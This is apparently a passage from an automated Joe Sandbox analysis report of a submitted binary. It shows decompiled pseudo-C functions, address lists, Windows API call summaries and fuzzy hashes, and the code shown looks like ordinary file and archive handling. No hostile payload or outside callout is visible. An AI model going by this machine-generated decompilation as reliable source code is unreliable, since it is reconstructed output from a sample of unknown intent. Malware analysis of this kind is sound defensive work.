                              							 *(_t518 + 4) =  *(_t518 + 4) & 0x00000000;
                              							 *(_t518 + 8) =  *(_t518 + 8) & 0x00000000;
                              							 *_t518 = 0x41b6d8;
                              							_t677 = _t518;
                              						}
                              						 *(_t678 - 0x18) = _t677;
                              						if(_t677 != 0) {
                              							 *((intOrPtr*)( *_t677 + 4))(_t677);
                              						}
                              						_t34 = _t677 + 8; // 0x8
                              						 *(_t678 - 4) = 3;
                              						E0040640D(_t34, _t662);
                              						 *(_t677 + 0x18) =  *(_t677 + 0x18) & 0x00000000;
                              						 *(_t677 + 0x1c) =  *(_t677 + 0x1c) & 0x00000000;
                              						 *(_t677 + 0x20) =  *(_t677 + 0x20) & 0x00000000;
                              						 *((intOrPtr*)(_t677 + 0x10)) =  *_t540;
                              						 *((intOrPtr*)(_t677 + 0x14)) =  *((intOrPtr*)(_t540 + 4));
                              						_push(_t678 - 0x18);
                              						E0040A5E4(_t678 - 0x2c);
                              						_t523 =  *(_t678 - 0x18);
                              						 *(_t678 - 4) = 2;
                              						if(_t523 != 0) {
                              							 *((intOrPtr*)( *_t523 + 8))(_t523);
                              						}
                              						 *(_t678 - 4) = 1;
                              						if(_t662 != 0) {
                              							 *((intOrPtr*)( *_t662 + 8))(_t662);
                              						}
                              						 *(_t678 + 8) =  *(_t678 + 8) + 1;
                              						_t540 = _t540 + 8;
                              					} while ( *(_t678 + 8) <  *((intOrPtr*)( *(_t678 + 0x18) + 0x30)));
                              					_t658 =  *((intOrPtr*)(_t678 - 0x30));
                              					goto L19;
                              				}
                              			}
                              0x0040b179
                              0x0040b2e5
                              0x0040b2e5
                              0x0040b2e5
                              0x0040b2e8
                              0x0040b2e8
                              0x0040b2ea
                              0x0040b2f8
                              0x0040b2fb
                              0x0040b2fd
                              0x0040b2ff
                              0x0040b310
                              0x0040b310
                              0x0040b310
                              0x0040b313
                              0x0040b313
                              0x0040b315
                              0x0040b44a
                              0x0040b44e
                              0x0040b456
                              0x0040b45a
                              0x0040b465
                              0x0040b469
                              0x0040b474
                              0x0040b478
                              0x0040b47d
                              0x0040b485
                              0x0040b48e
                              0x0040b493
                              0x0040b49d
                              0x0040b4a4
                              0x0040b4a9
                              0x0040b4b0
                              0x0040b4b5
                              0x00000000
                              0x0040b4b5
                              0x0040b31b
                              0x00000000
                              0x0040b31b
                              0x0040b301
                              0x0040b304
                              0x0040b304
                              0x0040b306
                              0x00000000
                              0x00000000
                              0x0040b308
                              0x0040b309
                              0x0040b30c
                              0x0040b30e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b30e
                              0x0040b37e
                              0x00000000
                              0x0040b37e
                              0x0040b2ef
                              0x0040b2f3
                              0x00000000
                              0x0040b2f3
                              0x0040b17f
                              0x0040b182
                              0x0040b182
                              0x0040b184
                              0x00000000
                              0x00000000
                              0x0040b18a
                              0x0040b18b
                              0x0040b18e
                              0x0040b190
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b192
                              0x0040b2e1
                              0x00000000
                              0x0040b31e
                              0x0040b325
                              0x0040b32a
                              0x0040b32d
                              0x0040b32e
                              0x0040b331
                              0x0040b331
                              0x00000000
                              0x0040b14b
                              0x0040b14b
                              0x0040b158
                              0x0040b15d
                              0x0040b160
                              0x0040b160
                              0x0040b160
                              0x00000000
                              0x0040b14b
                              0x0040b149
                              0x0040b0ca
                              0x0040b0cd
                              0x0040b0d0
                              0x0040b0d3
                              0x0040b382
                              0x0040b384
                              0x0040b388
                              0x0040b38d
                              0x0040b38d
                              0x0040b396
                              0x0040b39a
                              0x0040b3a5
                              0x0040b3a9
                              0x0040b3ae
                              0x0040b3b6
                              0x0040b3bf
                              0x0040b3c4
                              0x0040b3cb
                              0x0040b3d2
                              0x0040b42c
                              0x0040b42f
                              0x0040b434
                              0x0040b43b
                              0x0040b440
                              0x00000000
                              0x0040b440
                              0x0040b0e6
                              0x0040b0e8
                              0x0040b0ea
                              0x0040b3d9
                              0x0040b3dc
                              0x0040b3e0
                              0x0040b3e2
                              0x0040b3e7
                              0x0040b3e7
                              0x0040b3f0
                              0x0040b3f4
                              0x0040b3ff
                              0x0040b403
                              0x0040b408
                              0x0040b408
                              0x0040b408
                              0x0040b410
                              0x0040b419
                              0x0040b41e
                              0x0040b425
                              0x00000000
                              0x0040b425
                              0x0040b0f0
                              0x00000000
                              0x0040b33a
                              0x0040b340
                              0x0040b34c
                              0x0040b352
                              0x0040b356
                              0x0040b35e
                              0x0040b362
                              0x0040b367
                              0x0040b368
                              0x0040b36b
                              0x0040b36b
                              0x0040b374
                              0x0040b377
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040af7f
                              0x0040af7f
                              0x0040af88
                              0x0040af8d
                              0x0040af90
                              0x0040af93
                              0x0040af97
                              0x0040af9d
                              0x0040afa1
                              0x0040afa3
                              0x0040afa8
                              0x0040afaa
                              0x0040afac
                              0x00000000
                              0x00000000
                              0x0040afb2
                              0x0040afb5
                              0x0040afb9
                              0x0040afbd
                              0x0040afeb
                              0x0040afeb
                              0x0040afef
                              0x0040b270
                              0x0040b273
                              0x0040b277
                              0x0040b279
                              0x0040b27e
                              0x0040b27e
                              0x0040b287
                              0x0040b28b
                              0x0040b296
                              0x0040b29a
                              0x0040b29f
                              0x0040b2a7
                              0x0040b2b0
                              0x0040b2b5
                              0x0040b2bf
                              0x0040b2c6
                              0x0040b2cb
                              0x0040b2cb
                              0x0040b2cb
                              0x0040b2d2
                              0x00000000
                              0x0040b2d2
                              0x0040affb
                              0x0040b000
                              0x0040b004
                              0x0040b00c
                              0x0040b00c
                              0x0040b011
                              0x0040b017
                              0x0040b018
                              0x0040b01d
                              0x0040b020
                              0x0040b024
                              0x0040b026
                              0x0040b02b
                              0x0040b02b
                              0x0040b02e
                              0x0040b031
                              0x0040b035
                              0x0040b037
                              0x0040b03c
                              0x0040b03c
                              0x0040b03f
                              0x0040b042
                              0x0040b046
                              0x0040b048
                              0x0040b04d
                              0x0040b04d
                              0x0040b050
                              0x0040b056
                              0x0040b059
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b059
                              0x0040afbf
                              0x0040afc3
                              0x00000000
                              0x00000000
                              0x0040afc5
                              0x0040afc8
                              0x0040afca
                              0x0040b202
                              0x0040b205
                              0x0040b209
                              0x0040b20b
                              0x0040b210
                              0x0040b213
                              0x0040b213
                              0x0040b216
                              0x0040b218
                              0x0040b21c
                              0x0040b221
                              0x0040b221
                              0x0040b22a
                              0x0040b22e
                              0x0040b239
                              0x0040b23d
                              0x0040b242
                              0x0040b24a
                              0x0040b253
                              0x0040b258
                              0x0040b25f
                              0x0040b266
                              0x00000000
                              0x0040b266
                              0x0040afd4
                              0x0040afd9
                              0x0040afdc
                              0x0040afe4
                              0x0040afe4
                              0x00000000
                              0x0040afdc
                              0x0040b197
                              0x0040b19a
                              0x0040b19e
                              0x0040b1a0
                              0x0040b1a5
                              0x0040b1a5
                              0x0040b1a8
                              0x0040b1ab
                              0x0040b1af
                              0x0040b1b1
                              0x0040b1b6
                              0x0040b1b6
                              0x0040b1bf
                              0x0040b1c3
                              0x0040b1ce
                              0x0040b1d2
                              0x0040b1d7
                              0x0040b1df
                              0x0040b1e8
                              0x0040b1ed
                              0x0040b1f4
                              0x0040b1fb
                              0x00000000
                              0x0040af2c
                              0x0040af32
                              0x0040af36
                              0x0040af41
                              0x0040af45
                              0x0040af4a
                              0x0040af52
                              0x0040af5b
                              0x0040af60
                              0x0040af67
                              0x0040b535
                              0x0040b538
                              0x0040b53d
                              0x0040b544
                              0x0040b603
                              0x0040b603
                              0x00000000
                              0x0040b603
                              0x0040af2a
                              0x0040aea2
                              0x0040aea9
                              0x0040aeab
                              0x0040aead
                              0x0040aeb0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040ad7f
                              0x0040ad7f
                              0x0040ad82
                              0x0040ad82
                              0x0040ad84
                              0x0040ad8c
                              0x0040ad9c
                              0x0040ad9c
                              0x0040ad8e
                              0x0040ad8e
                              0x0040ad92
                              0x0040ad98
                              0x0040ad98
                              0x0040ada0
                              0x0040ada3
                              0x0040ada8
                              0x0040ada8
                              0x0040adae
                              0x0040adb0
                              0x0040adb6
                              0x0040adbc
                              0x0040adc1
                              0x0040adc7
                              0x0040adcb
                              0x0040adce
                              0x0040add6
                              0x0040adea
                              0x0040adea
                              0x0040add8
                              0x0040add8
                              0x0040addc
                              0x0040ade0
                              0x0040ade6
                              0x0040ade6
                              0x0040adee
                              0x0040adf1
                              0x0040adf6
                              0x0040adf6
                              0x0040adfa
                              0x0040adfd
                              0x0040ae01
                              0x0040ae0b
                              0x0040ae0f
                              0x0040ae13
                              0x0040ae17
                              0x0040ae1d
                              0x0040ae20
                              0x0040ae24
                              0x0040ae29
                              0x0040ae2c
                              0x0040ae32
                              0x0040ae37
                              0x0040ae37
                              0x0040ae3c
                              0x0040ae40
                              0x0040ae45
                              0x0040ae45
                              0x0040ae48
                              0x0040ae51
                              0x0040ae54
                              0x0040ae5d
                              0x00000000
                              0x0040ae5d

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040AD1E
                                • Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1
                                • Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B410
                              • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B517
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$Delete$H_prolog$Initialize
                              • String ID:
                              • API String ID: 3452124646-0
                              • Opcode ID: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
                              • Opcode Fuzzy Hash: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 80%
                              			E004059B3(void** __ecx) {
                              				signed int _t23;
                              				void* _t24;
                              				signed int _t26;
                              				intOrPtr* _t29;
                              				signed int _t31;
                              				void** _t50;
                              				void* _t52;
                              				intOrPtr _t57;
                              
                              				E00413954(E00419734, _t52);
                              				_t57 =  *0x423148; // 0x1
                              				_t50 = __ecx;
                              				if(_t57 != 0) {
                              					_t23 = E00405A63(__ecx);
                              					__eflags = _t23;
                              					if(_t23 != 0) {
                              						_t14 = _t52 + 0x14; // 0x414be4
                              						_t24 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *_t14,  *(_t52 + 0x18), 0); // executed
                              						__eflags = _t24 - 0xffffffff;
                              						_t19 = _t24 != 0xffffffff;
                              						__eflags = _t19;
                              						 *_t50 = _t24;
                              						_t23 = 0 | _t19;
                              					}
                              				} else {
                              					E00401C80(_t52 - 0x18,  *(_t52 + 8));
                              					 *((intOrPtr*)(_t52 - 4)) = 0;
                              					_t26 = AreFileApisANSI();
                              					asm("sbb eax, eax");
                              					_push( ~_t26 + 1);
                              					_t29 = E00403D04(_t52 - 0x24);
                              					 *((char*)(_t52 - 4)) = 1;
                              					_t8 = _t52 + 0x14; // 0x414be4
                              					_t31 = E0040597A(_t50, _t57,  *_t29,  *(_t52 + 0xc),  *(_t52 + 0x10),  *_t8,  *(_t52 + 0x18));
                              					E00403A9C( *((intOrPtr*)(_t52 - 0x24)));
                              					E00403A9C( *((intOrPtr*)(_t52 - 0x18)));
                              					_t23 = _t31;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
                              				return _t23;
                              			}












                              APIs
                              • __EH_prolog.LIBCMT ref: 004059B8
                              • AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC
                                • Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C
                              • CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Create$ApisH_prolog
                              • String ID: KA
                              • API String ID: 1948390111-4133974868
                              • Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
                              • Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 719 40483f-40484b 720 404859-404876 CreateFileW 719->720 721 40484d-404857 SetLastError 719->721 723 404894-404896 720->723 724 404878-40488e SetFileTime CloseHandle 720->724 722 404897-404899 721->722 723->722 724->723
                              C-Code - Quality: 100%
                              			E0040483F(WCHAR* __ecx, FILETIME* __edx, FILETIME* _a4, FILETIME* _a8) {
                              				void* _t5;
                              				int _t7;
                              				signed int _t10;
                              				FILETIME* _t13;
                              				void* _t15;
                              				void* _t17;
                              
                              				_t10 = 0;
                              				_t17 =  *0x423148 - _t10; // 0x1
                              				_t13 = __edx;
                              				if(_t17 != 0) {
                              					_t5 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
                              					_t15 = _t5;
                              					if(_t15 != 0xffffffff) {
                              						_t7 = SetFileTime(_t15, _t13, _a4, _a8); // executed
                              						_t10 = 0 | _t7 != 0x00000000;
                              						CloseHandle(_t15);
                              					}
                              					return _t10;
                              				}
                              				SetLastError(0x78);
                              				return 0;
                              			}










                              APIs
                              • SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
                              • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
                              • SetFileTime.KERNELBASE(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
                              • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastTime
                              • String ID:
                              • API String ID: 2291555494-0
                              • Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
                              • Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 95%
                              			E00408524(intOrPtr* __ecx) {
                              				intOrPtr* _t153;
                              				signed int _t157;
                              				intOrPtr _t162;
                              				signed int _t163;
                              				signed int _t165;
                              				signed int _t169;
                              				signed int _t171;
                              				signed int _t172;
                              				signed int _t178;
                              				signed int _t179;
                              				signed int _t185;
                              				void* _t187;
                              				signed int _t190;
                              				void* _t196;
                              				char* _t201;
                              				signed int _t203;
                              				signed int _t205;
                              				intOrPtr _t210;
                              				signed int _t220;
                              				signed int _t222;
                              				void* _t225;
                              				signed int _t231;
                              				intOrPtr _t257;
                              				intOrPtr _t278;
                              				signed int* _t289;
                              				signed int _t292;
                              				intOrPtr _t293;
                              				intOrPtr _t295;
                              				void* _t297;
                              
                              				E00413954(E00419AE4, _t297);
                              				_t289 = __ecx;
                              				_t292 = 0;
                              				_t153 =  *((intOrPtr*)(__ecx));
                              				if(_t153 != 0) {
                              					 *((intOrPtr*)( *_t153 + 8))(_t153);
                              					 *((intOrPtr*)(__ecx)) = 0;
                              				}
                              				 *(_t289 + 0x34) = _t292;
                              				 *( *(_t289 + 0x30)) = _t292;
                              				E0040455D(_t289 + 4);
                              				 *(_t297 - 4) = _t292;
                              				 *(_t297 - 0x20) = _t292;
                              				 *(_t297 - 0x1c) = _t292;
                              				 *(_t297 - 0x18) = _t292;
                              				E00402170(_t297 - 0x20, 3);
                              				_t157 =  *(_t297 - 0x28);
                              				 *(_t297 - 4) = 1;
                              				if(_t157 == _t292) {
                              					L11:
                              					E004032A8(_t297 - 0x68, 4);
                              					 *((intOrPtr*)(_t297 - 0x68)) = 0x41b378;
                              					__eflags =  *(_t297 + 0xc) - _t292;
                              					 *(_t297 - 4) = 3;
                              					if( *(_t297 + 0xc) < _t292) {
                              						_t231 =  *(_t297 + 8);
                              						 *(_t297 + 0xc) = _t292;
                              						__eflags =  *(_t231 + 0x10);
                              						if( *(_t231 + 0x10) <= 0) {
                              							L18:
                              							__eflags =  *(_t297 + 0x10);
                              							if( *(_t297 + 0x10) != 0) {
                              								L22:
                              								_t292 = 0;
                              								__eflags = 0;
                              								L23:
                              								__eflags =  *((intOrPtr*)(_t297 - 0x60)) - _t292;
                              								 *(_t297 + 0xc) = _t292;
                              								if( *((intOrPtr*)(_t297 - 0x60)) <= _t292) {
                              									L37:
                              									_t293 = 1;
                              									L38:
                              									 *(_t297 - 4) = 1;
                              									E004042AD(_t297 - 0x68);
                              									E00403A9C( *(_t297 - 0x20));
                              									E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
                              									_t162 = _t293;
                              									L39:
                              									 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
                              									return _t162;
                              								} else {
                              									goto L24;
                              								}
                              								do {
                              									L24:
                              									_t163 =  *(_t297 + 0x10);
                              									__eflags = _t163 - _t292;
                              									if(_t163 == _t292) {
                              										L26:
                              										 *(_t297 + 8) = _t292;
                              										 *(_t297 - 4) = 4;
                              										_t165 =  *( *((intOrPtr*)(_t297 - 0x5c)) +  *(_t297 + 0xc) * 4);
                              										 *(_t289 + 0x1c) = _t165;
                              										E0040640D(_t297 + 8,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t165 * 4)) + 4))());
                              										_t169 =  *(_t297 + 8);
                              										__eflags = _t169 - _t292;
                              										if(_t169 != _t292) {
                              											__eflags =  *(_t297 + 0x10) - _t292;
                              											if( *(_t297 + 0x10) == _t292) {
                              												 *(_t297 - 0x14) = _t292;
                              												 *(_t297 - 4) = 5;
                              												 *((intOrPtr*)( *_t169))(_t169, 0x41b1f8, _t297 - 0x14);
                              												_t171 =  *(_t297 - 0x14);
                              												__eflags = _t171 - _t292;
                              												if(_t171 == _t292) {
                              													_t172 =  *(_t297 + 8);
                              													 *(_t297 - 4) = 3;
                              													__eflags = _t172 - _t292;
                              													if(_t172 != _t292) {
                              														 *((intOrPtr*)( *_t172 + 8))(_t172);
                              													}
                              													 *(_t297 - 4) = 1;
                              													E004042AD(_t297 - 0x68);
                              													E00403A9C( *(_t297 - 0x20));
                              													E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
                              													_t162 = 0x80004001;
                              													goto L39;
                              												}
                              												 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t171 + 0xc))(_t171,  *((intOrPtr*)(_t297 + 0x14)));
                              												_t178 =  *(_t297 - 0x14);
                              												__eflags = _t178 - _t292;
                              												 *(_t297 - 4) = 4;
                              												if(_t178 != _t292) {
                              													 *((intOrPtr*)( *_t178 + 8))(_t178);
                              												}
                              												L33:
                              												__eflags =  *((intOrPtr*)(_t297 - 0x10)) - 1;
                              												if( *((intOrPtr*)(_t297 - 0x10)) != 1) {
                              													__eflags =  *((intOrPtr*)(_t297 - 0x10)) - _t292;
                              													if( *((intOrPtr*)(_t297 - 0x10)) == _t292) {
                              														 *(_t297 - 0x54) = _t292;
                              														 *(_t297 - 0x52) = _t292;
                              														_t179 =  *(_t297 + 8);
                              														 *(_t297 - 4) = 6;
                              														 *((intOrPtr*)( *_t179 + 0x20))(_t179, 0x37, _t297 - 0x54);
                              														__eflags =  *(_t297 - 0x54) - _t292;
                              														if( *(_t297 - 0x54) != _t292) {
                              															__eflags =  *(_t297 - 0x54) - 8;
                              															_t201 =  *(_t297 - 0x4c);
                              															if( *(_t297 - 0x54) != 8) {
                              																_t201 = L"Unknown error";
                              															}
                              															E00401D1B(_t289 + 0x30, _t201);
                              														}
                              														 *(_t297 - 4) = 4;
                              														E00405E34(_t297 - 0x54);
                              														E0040640D(_t289,  *(_t297 + 8));
                              														_t295 =  *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) +  *(_t289 + 0x1c) * 4));
                              														__eflags =  *(_t295 + 0x20);
                              														if( *(_t295 + 0x20) != 0) {
                              															_t185 = E004088CE(_t295, _t297 - 0x20);
                              															__eflags = _t185;
                              															if(_t185 < 0) {
                              																_t185 = 0;
                              																__eflags = 0;
                              															}
                              															_t257 =  *((intOrPtr*)(_t295 + 0x24));
                              															_t143 =  *((intOrPtr*)(_t257 + _t185 * 4)) + 0xc; // 0xc
                              															_push( *((intOrPtr*)(_t257 + _t185 * 4)));
                              															_t187 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
                              															 *(_t297 - 4) = 0xa;
                              															E00401D7A(_t289 + 0x10, _t187);
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
                              														} else {
                              															E00401C80(_t297 - 0x44, 0x423338);
                              															 *(_t297 - 4) = 7;
                              															E00401C80(_t297 - 0x38, 0x423338);
                              															_push(_t297 - 0x44);
                              															_push(_t297 - 0x38);
                              															 *(_t297 - 4) = 8;
                              															_t196 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
                              															 *(_t297 - 4) = 9;
                              															E00401D7A(_t289 + 0x10, _t196);
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x38)));
                              															E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
                              														}
                              														_t190 =  *(_t297 + 8);
                              														 *(_t297 - 4) = 3;
                              														__eflags = _t190;
                              														if(_t190 != 0) {
                              															 *((intOrPtr*)( *_t190 + 8))(_t190);
                              														}
                              														_t293 = 0;
                              													} else {
                              														_t203 =  *(_t297 + 8);
                              														 *(_t297 - 4) = 3;
                              														__eflags = _t203 - _t292;
                              														if(_t203 != _t292) {
                              															 *((intOrPtr*)( *_t203 + 8))(_t203);
                              														}
                              														_t293 =  *((intOrPtr*)(_t297 - 0x10));
                              													}
                              													goto L38;
                              												}
                              												_t205 =  *(_t297 + 8);
                              												 *(_t297 - 4) = 3;
                              												__eflags = _t205 - _t292;
                              												if(_t205 != _t292) {
                              													 *((intOrPtr*)( *_t205 + 8))(_t205);
                              												}
                              												goto L36;
                              											}
                              											 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t169 + 0xc))(_t169,  *(_t297 + 0x10), 0x41b5f8,  *((intOrPtr*)(_t297 + 0x18)));
                              											goto L33;
                              										}
                              										 *(_t297 - 4) = 3;
                              										goto L36;
                              									}
                              									_t210 =  *((intOrPtr*)( *_t163 + 0x10))(_t163, _t292, _t292, _t292, _t292);
                              									__eflags = _t210 - _t292;
                              									if(_t210 != _t292) {
                              										_t293 = _t210;
                              										goto L38;
                              									}
                              									goto L26;
                              									L36:
                              									 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
                              									__eflags =  *(_t297 + 0xc) -  *((intOrPtr*)(_t297 - 0x60));
                              								} while ( *(_t297 + 0xc) <  *((intOrPtr*)(_t297 - 0x60)));
                              								goto L37;
                              							}
                              							__eflags =  *(_t297 + 0xc) - 1;
                              							if( *(_t297 + 0xc) == 1) {
                              								E004042EB(_t297 - 0x68, 1);
                              								goto L22;
                              							}
                              							_t293 = 0x80004001;
                              							goto L38;
                              						} else {
                              							goto L14;
                              						}
                              						do {
                              							L14:
                              							__eflags = E004088CE( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t292 * 4)), _t297 - 0x20);
                              							if(__eflags < 0) {
                              								E004039DF(_t297 - 0x68, _t292);
                              							} else {
                              								 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
                              								E00404407(_t297 - 0x68, __eflags,  *(_t297 + 0xc));
                              								 *(( *(_t297 + 0xc) << 2) +  *((intOrPtr*)(_t297 - 0x5c))) = _t292;
                              								_t231 =  *(_t297 + 8);
                              							}
                              							_t292 = _t292 + 1;
                              							__eflags = _t292 -  *(_t231 + 0x10);
                              						} while (_t292 <  *(_t231 + 0x10));
                              						goto L18;
                              					}
                              					E004039DF(_t297 - 0x68,  *(_t297 + 0xc));
                              					_t231 =  *(_t297 + 8);
                              					goto L23;
                              				} else {
                              					_t278 =  *((intOrPtr*)(_t297 - 0x2c));
                              					_t220 = _t278 + _t157 * 2 - 2;
                              					while( *_t220 != 0x2e) {
                              						if(_t220 == _t278) {
                              							_t222 = _t220 | 0xffffffff;
                              							__eflags = _t222;
                              							L9:
                              							__eflags = _t222 - _t292;
                              							if(_t222 >= _t292) {
                              								__eflags = _t222 + 1;
                              								_t225 = E00401E19(_t297 - 0x2c, _t297 - 0x44, _t222 + 1);
                              								 *(_t297 - 4) = 2;
                              								E00401D7A(_t297 - 0x20, _t225);
                              								 *(_t297 - 4) = 1;
                              								E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
                              							}
                              							goto L11;
                              						} else {
                              							_t220 = _t220;
                              							continue;
                              						}
                              					}
                              					_t222 = _t220 - _t278 >> 1;
                              					goto L9;
                              				}
                              			}

































                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 83B$Unknown error
                              • API String ID: 3519838083-1944086607
